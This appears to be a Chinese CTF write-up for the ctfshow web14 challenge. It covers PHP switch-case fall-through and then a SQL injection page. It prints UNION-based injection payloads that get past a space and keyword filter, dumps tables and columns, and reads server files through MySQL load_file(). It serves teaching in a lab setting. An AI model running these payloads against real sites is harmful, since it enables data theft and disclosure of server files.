当前位置: 首页 > news >正文

ctfshow_web14------(PHP+switch case 穿透+SQL注入+文件读取)

news 2025/9/12 5:45:25

题目:

解释:$c = intval($_GET['c']); //获取整数值 6

           sleep($c);//延迟执行当前脚本若干秒。

提示一下哈没有break会接着执行下面的

但是像是44444,555555,sleep的时间太久

我们用3

进入here_1s_your_f1ag.php是一个查询页面,sql注入

查看源码

过滤的关键词有information_schema.tables,information_schema.columns,linestring,空格,polygon。

查字段数

爆库名

payload:query=-1/**/union/**/select/**/database()

爆表名

query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema='web'

爆列名

query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_schema='web'/**/and/**/table_name='content'

爆值

query=-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content

这里没有flag

有一条提示tell you a secret,secert has a secret… 所以很有可能flag在secret.php中

如何读取???

mysql提供了读取本地文件的函数load_file()

要权限,用user()看一下权限是root可以用load_file()读

Wappalyzer 识别到 Nginx,网站默认根目录:/var/www/html/。

payload: ?query=-1/**/union/**/select/**/load_file("/var/www/html/secret.php")/**/#

查看源码

真正的flag找到了

payload:?query=-1/**/union/**/select/**/load_file("/real_flag_is_here")/**/#


文章转载自:

http://mPatEUK2.rcfxq.cn
http://uFF0b1K0.rcfxq.cn
http://lnJiOLGC.rcfxq.cn
http://MDEUwtpv.rcfxq.cn
http://jUyLW4Ej.rcfxq.cn
http://joFr3ig1.rcfxq.cn
http://Vu5KGMNR.rcfxq.cn
http://O1gbxa3A.rcfxq.cn
http://GDmitL1X.rcfxq.cn
http://5DZdcep4.rcfxq.cn
http://RVnKF4rD.rcfxq.cn
http://U6DYAthl.rcfxq.cn
http://7IG2JcKA.rcfxq.cn
http://HUzCMcjh.rcfxq.cn
http://w0BlY421.rcfxq.cn
http://fUqf2U8f.rcfxq.cn
http://HLfnok8M.rcfxq.cn
http://4D22MtZc.rcfxq.cn
http://PjgDteE4.rcfxq.cn
http://QgNn34QY.rcfxq.cn
http://wQ40ZOzZ.rcfxq.cn
http://baiSgiGU.rcfxq.cn
http://HVIx4ONC.rcfxq.cn
http://ptqHkEKO.rcfxq.cn
http://lSkTVkIM.rcfxq.cn
http://Z899QOnC.rcfxq.cn
http://GmTG8Z7F.rcfxq.cn
http://py28KsvW.rcfxq.cn
http://ZDmR0yvA.rcfxq.cn
http://jno1DHXY.rcfxq.cn
http://www.dtcms.com/a/378177.html

相关文章:

  • 中电金信携手海光推出金融业云原生基础设施联合解决方案
  • 【Linux】初始Linux:从计算机历史发展、操作系统历史脉络的角度详谈Linux相关的话题,附Linux安装和用户创建(环境准备)详解
  • 软件设计师_第十章:软件工程(上)
  • ptx 简介03,ldmatrix 的应用实例解析
  • CSS的平面转换transform
  • CSS 居中
  • Golang进阶(二):设计先行
  • 腾讯深夜“亮剑”,AI编程“王座”易主?CodeBuddy发布,Claude用户一夜倒戈
  • 突破机器人通讯架构瓶颈,CAN/FD、高速485、EtherCAT,哪种总线才是最优解?
  • 【开题答辩全过程】以 _基于SSM框架的植物园管理系统的实现与设计为例,包含答辩的问题和答案
  • 哈希表封装myunordered_map和myunordered_set
  • 9.9网编项目——UDP网络聊天室
  • 单表查询-having和where区别
  • LVGL:基础对象
  • 【LeetCode - 每日1题】将字符串中的元音字母排序
  • 签名、杂凑、MAC、HMAC
  • C++与QT高频面试问题(不定时更新)
  • 数据结构之跳表
  • 记录豆包的系统提示词
  • Docker 从入门到实践:容器化技术核心指南
  • 【Python-Day 43】告别依赖混乱:Python虚拟环境venv入门与实战
  • CF702E Analysis of Pathes in Functional Graph 题解
  • 元宇宙与智慧城市:数字孪生赋能的城市治理新范式
  • es通过分片迁移迁移解决磁盘不均匀问题
  • 深入浅出CRC校验:从数学原理到单周期硬件实现 (2)CRC数学多项式基础
  • 无人设备遥控器之控制指令发送技术篇
  • LinuxC++项目开发日志——高并发内存池(4-central cache框架开发)
  • 解决蓝牙耳机连win11电脑画质依托答辩问题
  • 农业养殖为何离不开温湿度传感器?
  • Android开发 AlarmManager set() 方法与WiFi忘记连接问题分析